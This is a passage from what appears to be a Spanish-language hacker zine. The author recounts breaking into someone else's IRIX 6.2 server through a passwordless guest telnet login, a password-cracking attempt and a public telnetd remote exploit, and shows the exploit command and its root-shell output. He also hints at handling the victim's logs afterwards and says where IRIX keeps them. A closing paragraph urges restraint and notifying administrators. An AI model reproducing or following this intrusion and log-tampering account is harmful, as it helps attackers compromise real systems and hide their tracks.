Lo primero que hice cuando lo encontre fue hacerle telnet, luego probe por corazonada el login "guest" y ni siquiera me pidio password (se acuerdan la falla que corregia en mi texto de passwords??) bueno para mas remate el passwd no estaba shadowed, por lo que veia los passwords encriptados, lo que no me ayudo mucho, porque estaban bien elegidos, tuve el john dos dias corriendo y nada, asi que como ademas no habia compilador no podia subirle un exploit local (no encontre en bash) asi que me quedaba una opcion, una falla del mismo demonio de telnet para irix, asi que manos a la obra, entre como guest y ejecute uname -a para irme a la segura, era un IRIX 6.2. Me fui a buscar el exploit, lo compile y me tire...
[ little@.... ]$ ./telnetd xxxx.com.xx -v 62
copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/
telnetd for irix 6.2 6.3 6.4 6.5 6.5.8 IP:all
......
IRIX 6.2 ...
< ahora estoi en una shell, pero que no me muestra el prompt >
id
UID=0(root) GID=0(sys)
< hermoso no? >aqui ya me fui y nos fuimos.
bueno ahi sabran los que hicimos despues, los logs...
Para los que no conozcan los sistemas irix, yo encontre los logs en /var/adm/ puede que en este caso haya sido una excepcion, pero viendo como estaba la seguridad en el sistema asi debe ser la instalacion por defecto. Ademas el resto estaba linkado en /etc/ asi que fue incluso mas facil pillarlos. No voi a seguir poniendo, ya que algo les queda por experimentar a ustedes, los que siguen son todos hacks remotos. Tambien esta es la unica edicion donde voi a poner la seccion de exploits de esta forma, a partir del proximo seguimos con nuestro estilo.
Para los que todavia estan dedicados a hackear 100%, me gustaria darles un consejo, la verdad es que en un principio, hackear es lo maximo, pero luego con el tiempo te vas dando cuenta que hay hacks que no valen la pena, para que entrar en todas las partes que puedas, solo entra en las que no pudiste, eso es un reto y no hackees si no sabes lo que haces no dañes nada y sobre cambiar las webs, ten respeto, puede que a veces sea justificado, pero mi opinion es que es mucho mas de hacker avisar al administrador del sistema que tiene una falla. Ademas que la mejor manera de demostrar lo que sabes es escribiendo, ayudando gente, creando cosas, no destruyendolas, no necesitas hackear una web para ser respetado, demuestra que sabes haciendo otra cosa. Un ejemplo es Linus Torvalds, el no hackio nada para ser admirado, pero creo algo digno de admiracion, yo personalmente admiro mucho mas a Linus Torvalds que a un tipo que se hackea la nasa.
Saludos
z0rbas
